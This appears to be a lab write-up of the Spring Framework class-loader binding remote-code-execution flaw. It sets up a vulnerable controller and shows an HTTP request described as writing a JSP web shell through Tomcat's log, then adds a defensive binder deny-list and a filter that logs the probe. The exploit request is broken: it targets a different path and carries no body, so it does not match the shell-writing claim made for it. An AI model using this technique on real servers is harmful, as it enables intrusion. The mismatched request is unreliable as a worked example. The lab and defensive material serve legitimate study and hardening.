- JDK 9+
- Spring and frameworks derived from it
- The Spring project is deployed on Tomcat
- POJO parameter binding is used
- Spring Framework 5.3.X < 5.3.18, 5.2.X < 5.2.20, or other versions
- Java vulnerable lab (target range)
- JDK 11 (must be 9 or above)
- Tomcat 8
```java
// Plain POJO that the controller below binds from request parameters
// (for example ?message=hi); the data binder walks this bean's properties.
public class HelloWorld {
    private String message;

    public String getMessage() {
        return message;
    }

    public void setMessage(String message) {
        this.message = message;
    }
}
```
3. Then write a controller whose parameter is this entity type
```java
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
@RequestMapping("/spring")
public class SpringRce {
    // HelloWorld is a plain POJO argument, so it is populated by WebDataBinder
    @RequestMapping("/rce")
    public void vulnerable(HelloWorld model) {
    }
}
```
4. Package the project as a war, deploy it to Tomcat and run it
File -> Project Structure
Then Build -> Build Artifacts to generate the war, copy it into Tomcat's webapps directory and start Tomcat
The first packet uses the Tomcat log file to write a JSP shell under webapps/ROOT
```http
POST /java-sec/xstream HTTP/1.1
Cookie: JSESSIONID=0873A909194640CBAF9EEBC2283C6C97; XSRF-TOKEN=1d91ead1-6fa9-4f1d-b8c9-5cf57dc020b8; remember-me=YWRtaW46MTY1MjUxMTU2MjQ1MTo2M2U2NmNkZjdkOWNhZDAyMzMyMjhhMjAwN2NiZTc4YQ
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Accept-Language: zh-CN,zh-Hans;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 0
```

IV. Using this in testing
Black-box blind testing: pass a property under the class loader, class.module.classLoader.defaultAssertionStatus=123, and check whether the server side throws an exception
White-box testing: either satisfy the exploitation conditions listed above, or find a controller that binds POJO parameters and try it there
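The POJO-binding endpoint above can be hardened on the Spring side while an upgrade to 5.3.18 / 5.2.20 is pending. The following is an added defensive example, not code from the original post: a global binder deny-list (the patterns Spring published as its workaround) plus a filter that logs the class.module.classLoader probe described in the black-box test. Class names are hypothetical; it assumes Spring Framework 5.x on javax.servlet (Tomcat 8) and that the filter is registered with the container (Spring Boot does this for @Component filters; a plain war needs web.xml or a WebApplicationInitializer entry).

```java
import java.io.IOException;
import java.util.Collections;
import java.util.List;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
import org.springframework.stereotype.Component;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.filter.OncePerRequestFilter;

// Hypothetical class names; applies to every controller that binds a POJO
// argument, such as SpringRce.vulnerable(HelloWorld). Upgrading Spring is
// the real fix; this only narrows what the binder will touch until then.
@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE)
class BinderDenyListAdvice {
    @InitBinder
    public void denyClassLoaderPaths(WebDataBinder binder) {
        // Refuse property paths that start with or pass through "class", so the
        // binder never walks getClass() -> module -> classLoader. Matching is
        // case-sensitive, hence both spellings.
        binder.setDisallowedFields("class.*", "Class.*", "*.class.*", "*.Class.*");
    }
}

// Logs, without blocking, any parameter name that tries to reach the class
// loader, e.g. the blind probe class.module.classLoader.defaultAssertionStatus.
@Component
class ClassLoaderProbeLoggingFilter extends OncePerRequestFilter {
    @Override
    protected void doFilterInternal(HttpServletRequest req, HttpServletResponse res,
                                    FilterChain chain) throws ServletException, IOException {
        List<String> hits = Collections.list(req.getParameterNames());
        hits.removeIf(p -> !p.toLowerCase().contains("class.module.classloader"));
        if (!hits.isEmpty()) {
            // logger is the commons-logging Log inherited from GenericFilterBean
            logger.warn("class loader binding probe from " + req.getRemoteAddr()
                    + " to " + req.getRequestURI() + " params=" + hits);
        }
        chain.doFilter(req, res);
    }
}
```

setDisallowedFields replaces the list rather than appending to it, so a controller that calls it in its own @InitBinder overrides this advice and must include the same patterns itself.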